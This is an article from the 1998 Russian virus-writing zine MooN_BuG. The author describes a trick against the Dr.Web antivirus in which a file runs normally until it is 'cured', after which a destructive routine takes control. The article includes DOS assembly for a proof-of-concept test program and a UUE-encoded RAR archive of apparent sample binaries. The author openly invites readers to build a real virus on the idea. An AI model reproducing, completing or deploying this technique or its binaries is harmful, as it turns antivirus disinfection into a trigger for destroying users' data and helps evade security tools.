[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 9, Dec 1998                                           file 00A

                          Деструкция = DrWeb + Cure
                                                    by FRiZER

     Земский Фершал. 2-й выпуск. Про DrWeb 4.0, а именно про Ninniysh.Generic.
Навеяло  на  мысль  сделать  подлянку  Dr.Web'у.  А  именно - до лечения файлы
работают нормально, а после при запуске управление получает деструкция ;)
     p.S.  это пока пример - надеюсь поймете что происходит. может быть кто-то
сделает вирус-пример.

; Fake-Ninnyish.Test by FRiZER'98
.model tiny
.code
.386
.startup
org 100h
s:
        call    fake_vir
program:
        call    prn
        db      'Program',13,10,'$'
prn:    pop     dx
        mov     ah,9
        int     21h
        ret
trojan:
        call    prn
        db      'Trojan!',13,10,'$'

fake_vir:
        call    $+3
        pop     bx
        sub     bx,3+(100h-(fake_buf-fake_vir))
        mov     cx,3
        lea     si,[bx+100h]
        lea     di,[bx+100h]
        sub     di,bx
        pop     ax
        sub     ax,cx
        push    ax
        add     si,cx
        movsw
        movsb
        ret
fake_buf:
web_call:
        db      0E9h
        dw      trojan-s-3
realcall:
        db      0E9h
        dw      program-s-3
end

=== Cut ===
section 1 of 1 of file fucke.rar    -={ UUE 1.06, ARA (C) 1995 }=-

begin 644 fucke.rar  12-5-1998 15:8:8
M4F%R(1H'`#O0<P@`#0````````#\\'0`@"P`3@```",`````U_,#BP^F6R44
M-0P`(````$%&5$520U52+D-/30F!@,E``````)/_&E[!I;@+@TWC.@P19:2"
M"H;@;P#<+7@:",D1L\,0V&3)@P9(,7@CP'ZWW-GG#BA3*IF+H,5,EW_1&;N.
MHO"G72@Q4H!]=!"`+``9````1P````#^6W<!**=;)10U#``@````0D5&3U)#
?55(N0T]-=!]R`EKVU&!`V\?FX]\/,<.2B;VV9O.'@!
`
end
sum -r/size 63409/336 section (from "begin" to "end")
sum -r/size 33337/211 entire input file
=== Cut ===
